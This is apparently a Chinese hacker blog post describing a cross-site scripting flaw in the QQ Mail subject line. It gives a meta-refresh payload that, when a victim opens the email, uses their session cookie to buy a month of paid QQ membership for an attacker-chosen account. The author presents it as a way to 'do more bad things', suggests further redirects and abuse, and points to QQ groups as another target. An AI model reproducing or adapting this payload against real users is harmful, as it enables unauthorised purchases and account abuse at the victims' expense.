利用QQ跨站脚本漏洞做更多的坏事

[HTML]我发了几个 QQ 的跨站脚本 漏洞 。下午突然想到除了偷cookie以外，我们还可以利用他来干更多的坏事：）就拿 QQ 邮箱的跨站脚本 漏洞 来举例。我们发送一封恶意邮件，在邮件标题上写入：你好想和你做个朋友可以吗 CONTENT="0;URL=http://paycenter.qq.com/cgi-bin/paypresent.cg i?service _ type=club&subtype=1&month=1&uin1=47563 34&uin2=4756334&leaveword=123">
当别人收到邮件以后从邮件标题上看，完全看不出破绽，如图： 可是当点开邮件的时候，藏在标题中的 代码 就会执行，这段 代码 的意思是立刻转移到 _ type=club&subtype=1&month=1&uin1=4756334&uin2=4756334&leaveword=123" target= _ blank> http://paycenter.qq.com/cgi-bin/paypresent.cgi?service _ type= club&subtype=1&month=1&uin1=4756334&uin2=475 6334&leaveword=123
这个url的意思是给4756334这个号码购买一个月的 会员 服务 ，留言内容是123。这时由于用户cookie中有用户的加密身份验证串，自然就会顺利用过，如图： 哈哈，我是穷人，一个月的 会员 也买不起的：P呵呵。这个只是举个例子而已。其实我们引申一下可以做更多的坏事。只要是脚本和html 代码 可以做的，我们全都可以做：）比如跳转到其他网站的网页，做了XX的事情再跳回来。嘿嘿。大家自己去想吧 QQ 群的跨站 漏洞 也可以：） [/HTML]